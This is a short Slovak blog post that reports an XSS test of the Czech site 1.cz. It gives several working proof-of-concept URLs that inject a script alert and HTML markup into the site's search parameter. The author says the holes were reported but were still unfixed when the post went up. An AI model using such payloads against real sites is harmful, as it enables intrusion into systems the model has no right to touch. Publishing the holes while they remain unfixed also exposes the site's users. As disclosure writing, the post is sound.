- Ako urobiť z linkov v code živé linky (pre Firefox a Operu)
- Volanie zadarmo cez zlatestranky.sk
- Zoznam freehostingov so subdomenami
- Vytvorenie CS 1.6 servera zdarma
- Free SMS cez internet
- Spider-Man: Web of Shadows
- Európski poslanci chcú chrániť deti pred zneužitím na internete
- Facebook hostuje až desať miliárd fotografií
- V USA majú nový anti-pirátsky zákon
- Apple odhalí nové MacBooky 14. októbra
XSS: 1.cz
Krátky XSS test stránky 1.czKrátky XSS test stránky 1.cz
Prehlásenie: Článok je napísaný len na vzdelávacie účely, za prípadné zneužitie autor článku ani prevádzkovateľ stránky nezodpovedá.
Šok som dostal hned na začiatku, základné vstupy neošetrené
http://1.cz/index.php?q=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&mt=2&tt=2&st=&mts=1
http://1.cz/index.php?q=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&mt=2&tt=2&mts=1&sec=img&quid=197834
http://1.cz/index.php?q=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&age=0&mt=2&tt=2&mts=1&sec=news&quid=197867
Dalej HTML Haluze http://www.1.cz/index.php?q=%3Cmarquee%3ERoFl%3C%2Fmarquee%3E&mt=2&tt=2&mts=1&sec=&quid=279738
Da sa toho vela len treba chcieť
Spoločnosti som písal pred 8 dnami, odpovede som sa nedockal, xyby opravene neboli...
Kaidžas
God.Hell |
27. červenece 08, 19:07
Související články
- Rychlovka: Koniec SK / CZ warez fór ? (22. červenece 08, 11:07)
- Do boja o seznam.cz ide aj google ! (30. červenece 08, 13:07)
- XSS v praxi (14. červenece 08, 10:07)
- Cross-site scrtipting (XSS) (15. červenece 08, 09:07)
- Európske vládne stránky a XSS (16. červenece 08, 23:07)
- XSS test #1: Zoznam.sk (20. červenece 08, 14:07)
- Bezpečnosť Slovenských webov [XSS] (19. červenece 08, 06:07)